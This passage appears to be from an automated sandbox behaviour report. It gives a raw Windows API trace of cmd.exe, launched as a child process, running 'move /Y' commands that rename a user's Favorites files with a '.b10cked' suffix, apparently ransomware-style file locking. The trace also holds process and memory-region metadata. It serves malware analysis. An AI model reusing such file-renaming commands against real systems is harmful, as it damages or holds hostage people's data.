(_String1="move", _String2="RMDIR") returned -5 [0215.583] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0215.583] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0215.583] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0215.583] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0215.583] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0215.583] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0215.583] _wcsicmp (_String1="move", _String2="VER") returned -9 [0215.583] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0215.583] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0215.583] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0215.583] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0215.583] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0215.583] _wcsicmp (_String1="move", _String2="START") returned -6 [0215.583] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0215.583] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0215.583] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0215.585] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.585] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.585] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f75c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f754, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f754*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0215.585] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0215.586] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0215.586] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0215.586] _wcsicmp (_String1="MSNMON~1.URL", _String2=".") returned 63 [0215.586] _wcsicmp (_String1="MSNMON~1.URL", _String2="..") returned 63 [0215.586] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnmon~1.url")) returned 0x20 [0215.587] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x391e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.587] SetErrorMode (uMode=0x0) returned 0x0 [0215.587] SetErrorMode (uMode=0x1) returned 0x0 [0215.587] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL", nBufferLength=0x104, lpBuffer=0x28f0e4, lpFilePart=0x28f0cc | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL", lpFilePart=0x28f0cc*="MSNMON~1.URL") returned 0x2f [0215.587] SetErrorMode (uMode=0x0) returned 0x1 [0215.587] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1" (normalized: "c:\\users\\default\\favori~1\\msnweb~1")) returned 0x12 [0215.587] _wcsicmp (_String1="MSNMON~1.URL", _String2=".") returned 63 [0215.587] _wcsicmp (_String1="MSNMON~1.URL", _String2="..") returned 63 [0215.587] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnmon~1.url")) returned 0x20 [0215.587] SetErrorMode (uMode=0x0) returned 0x0 [0215.587] SetErrorMode (uMode=0x1) returned 0x0 [0215.587] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL", nBufferLength=0x104, lpBuffer=0x28f560, lpFilePart=0x28f2f8 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL", lpFilePart=0x28f2f8*="MSNMON~1.URL") returned 0x2f [0215.587] SetErrorMode (uMode=0x0) returned 0x1 [0215.587] SetErrorMode (uMode=0x0) returned 0x0 [0215.587] SetErrorMode (uMode=0x1) returned 0x0 [0215.587] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url.b10cked", nBufferLength=0x104, lpBuffer=0x28f768, lpFilePart=0x28f2f8 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url.b10cked", lpFilePart=0x28f2f8*="MSN Money.url.b10cked") returned 0x38 [0215.587] SetErrorMode (uMode=0x0) returned 0x1 [0215.587] SetLastError (dwErrCode=0x0) [0215.587] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn money.url.b10cked")) returned 0xffffffff [0215.588] GetLastError () returned 0x2 [0215.588] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL", fInfoLevelId=0x1, lpFindFileData=0x28ec74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28ec74) returned 0x380eb0 [0215.588] FindNextFileW (in: hFindFile=0x380eb0, lpFindFileData=0x28ec74 | out: lpFindFileData=0x28ec74) returned 0 [0215.588] GetLastError () returned 0x12 [0215.588] FindClose (in: hFindFile=0x380eb0 | out: hFindFile=0x380eb0) returned 1 [0215.589] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL", fInfoLevelId=0x1, lpFindFileData=0x391c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x391c08) returned 0x380eb0 [0215.589] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url.b10cked", nBufferLength=0x104, lpBuffer=0x28ef0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url.b10cked", lpFilePart=0x0) returned 0x38 [0215.589] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url", nBufferLength=0x104, lpBuffer=0x28ef0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url", lpFilePart=0x0) returned 0x30 [0215.589] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn money.url")) returned 0x20 [0215.589] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn money.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn money.url.b10cked"), dwFlags=0x3) returned 1 [0215.590] FindClose (in: hFindFile=0x380eb0 | out: hFindFile=0x380eb0) returned 1 [0215.590] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x28eec0 | out: _Buffer=" 1") returned 9 [0215.590] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.590] GetFileType (hFile=0x7) returned 0x2 [0215.590] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0215.590] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28ee4c | out: lpMode=0x28ee4c) returned 1 [0215.590] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.590] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x28ee80 | out: lpConsoleScreenBufferInfo=0x28ee80) returned 1 [0215.591] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0215.591] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x28eec0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0215.591] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x28eea4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28eea4*=0x1a) returned 1 [0215.591] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.591] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.591] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.591] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.592] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.592] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.592] SetConsoleInputExeNameW () returned 0x1 [0215.592] GetConsoleOutputCP () returned 0x1b5 [0215.592] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.592] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.592] exit (_Code=0) Process: id = "537" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16e60" os_pid = "0xba4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31804 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31805 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31806 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31807 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 31808 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31809 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31810 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31811 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31812 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 31813 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31926 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31927 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31928 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31929 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 31930 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 31931 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31932 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31933 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31934 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31935 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31936 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31937 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31938 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31939 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31940 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 31941 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31942 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31943 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31944 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31945 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31946 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31947 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 31948 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 31949 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Thread: id = 740 os_tid = 0xb34 [0215.495] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f934 | out: lpSystemTimeAsFileTime=0x26f934*(dwLowDateTime=0xb53fb180, dwHighDateTime=0x1d440a9)) [0215.495] GetCurrentProcessId () returned 0xba4 [0215.495] GetCurrentThreadId () returned 0xb34 [0215.495] GetTickCount () returned 0x3c512 [0215.495] QueryPerformanceCounter (in: lpPerformanceCount=0x26f92c | out: lpPerformanceCount=0x26f92c*=27228403069) returned 1 [0215.495] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0215.495] __set_app_type (_Type=0x1) [0215.495] __p__fmode () returned 0x76b331f4 [0215.495] __p__commode () returned 0x76b331fc [0215.496] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0215.496] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0215.496] GetCurrentThreadId () returned 0xb34 [0215.496] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb34) returned 0x38 [0215.496] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.496] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0215.496] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.496] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.496] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f8c4 | out: phkResult=0x26f8c4*=0x0) returned 0x2 [0215.496] VirtualQuery (in: lpAddress=0x26f8fb, lpBuffer=0x26f894, dwLength=0x1c | out: lpBuffer=0x26f894*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.496] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f894, dwLength=0x1c | out: lpBuffer=0x26f894*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0215.496] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f894, dwLength=0x1c | out: lpBuffer=0x26f894*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0215.496] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f894, dwLength=0x1c | out: lpBuffer=0x26f894*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.496] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f894, dwLength=0x1c | out: lpBuffer=0x26f894*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0215.496] GetConsoleOutputCP () returned 0x1b5 [0215.496] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.496] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0215.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.497] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0215.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.497] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.497] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.497] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.497] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.497] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.497] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0215.497] GetEnvironmentStringsW () returned 0x3c0178* [0215.498] FreeEnvironmentStringsW (penv=0x3c0178) returned 1 [0215.498] GetEnvironmentStringsW () returned 0x3c0178* [0215.498] FreeEnvironmentStringsW (penv=0x3c0178) returned 1 [0215.498] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e834 | out: phkResult=0x26e834*=0x40) returned 0x0 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x0, lpData=0x26e840*=0xa0, lpcbData=0x26e838*=0x1000) returned 0x2 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x4, lpData=0x26e840*=0x1, lpcbData=0x26e838*=0x4) returned 0x0 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x0, lpData=0x26e840*=0x1, lpcbData=0x26e838*=0x1000) returned 0x2 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x4, lpData=0x26e840*=0x0, lpcbData=0x26e838*=0x4) returned 0x0 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x4, lpData=0x26e840*=0x40, lpcbData=0x26e838*=0x4) returned 0x0 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x4, lpData=0x26e840*=0x40, lpcbData=0x26e838*=0x4) returned 0x0 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x0, lpData=0x26e840*=0x40, lpcbData=0x26e838*=0x1000) returned 0x2 [0215.498] RegCloseKey (hKey=0x40) returned 0x0 [0215.498] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e834 | out: phkResult=0x26e834*=0x40) returned 0x0 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x0, lpData=0x26e840*=0x40, lpcbData=0x26e838*=0x1000) returned 0x2 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x4, lpData=0x26e840*=0x1, lpcbData=0x26e838*=0x4) returned 0x0 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x0, lpData=0x26e840*=0x1, lpcbData=0x26e838*=0x1000) returned 0x2 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x4, lpData=0x26e840*=0x0, lpcbData=0x26e838*=0x4) returned 0x0 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x4, lpData=0x26e840*=0x9, lpcbData=0x26e838*=0x4) returned 0x0 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x4, lpData=0x26e840*=0x9, lpcbData=0x26e838*=0x4) returned 0x0 [0215.498] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e83c, lpData=0x26e840, lpcbData=0x26e838*=0x1000 | out: lpType=0x26e83c*=0x0, lpData=0x26e840*=0x9, lpcbData=0x26e838*=0x1000) returned 0x2 [0215.498] RegCloseKey (hKey=0x40) returned 0x0 [0215.498] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b1 [0215.498] srand (_Seed=0x5b8863b1) [0215.498] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN.url\" 